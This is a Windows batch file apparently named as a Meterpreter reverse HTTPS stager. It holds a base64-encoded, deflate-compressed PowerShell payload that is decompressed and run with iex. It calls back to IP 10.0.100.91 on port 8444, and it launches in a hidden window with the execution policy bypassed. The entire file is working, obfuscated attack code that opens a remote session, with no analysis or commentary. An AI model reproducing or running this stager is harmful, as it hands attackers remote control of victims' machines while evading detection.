meterp_powershell_reverse_https.bat

@echo off
set command="sal a New-Object;$IP='10.0.100.91';$Port='8444';iex(a IO.StreamReader((a IO.Compression.DeflateStream([IO.MemoryStream][Convert]::FromBase64String('xVZrU9NAFL2f+RWZDM40Q1uKIPIYZ0QqglqsPETtME7ahjYSktoQKI/+dfXcs0vog/rV6WSb3b17955z757Nn9/z8ksceYXntbgyJw2pSoTfnlxITxLpy6UUMHMuAd5jtJEsy3MpS5t2rnhyitU9yaSJfigt9FKs8vGYXiADvJv1DjzH6NXx9NH7AhvdI4N9JFv0mWBVYcIuwg5b2LONXgD/qRQxmmG1WjkYv5ZD9G4xOz5zNubXRJVg7khu4PMp6zr2SBhxC60nm/+Bl23i9Dl/JF3baz/Jy+j8FsZ1JsSuGVc/zZTG0UL0o5xNezZ2inWa+2nrOm19MBRYXNM7P+IyWdjBSl86M32OYtvDY7LholrnZB59U7su4nsD31V5C4/vZBe27+WDfJSa7MsnePwsB0BzJMeouBP5Kt/kO3w2wUEb3s8QQRcR/QQjEeKPEVsPJ6PPjGVyhcgHqJdbqcgSsrwsK/JCVuWlrMk6di/Dc4L9u2RgC4/ycINseYjzDB5i1pLB7LC+5+HVkzv0+uQrs3VQwK9hOWughrSK1PZfezhyj6dGnlJ6CqQE3E0gMlXsoH+ImQtYl+2bI8/wVIBsCW2FNgH1YB0YPRk+Gbv6ukNEZzn3LnKyBK9l8HKP8cRmrIVYS+g9RmHWLXCdZq+B6DtEXyKaGGMJIyuh9RFZiH8Tq9qXkdEAVh2s6PKEDbH3OH+6w+aM2APGrqeyTzUw1axjDbJqGD2Fj4FFZ94W+PaDuzmMoG1ZGFjuU6sJ43jVpkB1uJ6aORjBqzmJrR4UyPxwBoIO4zccO6yiEHFWEJe+KW8Rva+iQs3YAn4eY+1aTJecOc8Rti2GgOiciQyaXSL8h5bfc+svzT10c44i+ghZHQVb5ynsPcv8ZK7Uh0E7PuOiBq9wTo9ZXUMq8D4ttHpVW66oogHOdmJPS42M+qyoPrK4gd+DrbbbbC8ZXWjvggB64FOf2yOqtM2xCPkyKmlwKmZVpgyrhuTwws7s2wyPn7hD1FLKPS4Q9UP0J/hvYgfdM2Dcm9Qytdm1ShdQecpWdfWeydDX0ZLFp+tcaqYL3AmUKWTEviwi82WeZuU/4X1lkOk9ZHJcQ2x70EqtkzLOro6dkEWtx2tmZR964/EeU6SxRdqhbQNqe0NkjwrVy6tBkVTpJ+atq4iqjMEnli7vqB522UC0i1hxh2jq4HQD73V7kha5qwuPHvlJrH/DSSm/v41WKMdNMlSlniuWcOTcmO+cElCZ+0l5M4j11nY5F9u5lIy1aPVoszNxFlOu6VFxU+qRVsYcNeEV49X6m/19U0H2lLVxTStSj5epxxXbW0GrWWhMVNQBI7qkRgbom9szoLb1Jk6JVlONGpfyBons+dim7Q3PaY/1VGHbGLuLTzk/sHeQmVFOCjzZRZv/SXWey1mY/TVjMBbpvZj3KvmdlvArRnOTkbtNnquHrxK907SmA1ZfiZhbzI5q2hpVUHn8Cw=='),[IO.Compression.CompressionMode]::Decompress)),[Text.Encoding]::ASCII)).ReadToEnd()"
echo %command%

if %PROCESSOR_ARCHITECTURE%==x86 (powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command %command%) else (%WinDir%\syswow64\windowspowershell\v1.0\powershell.exe -NoP -NonI -W Hidden -Exec Bypass  -Command %command%)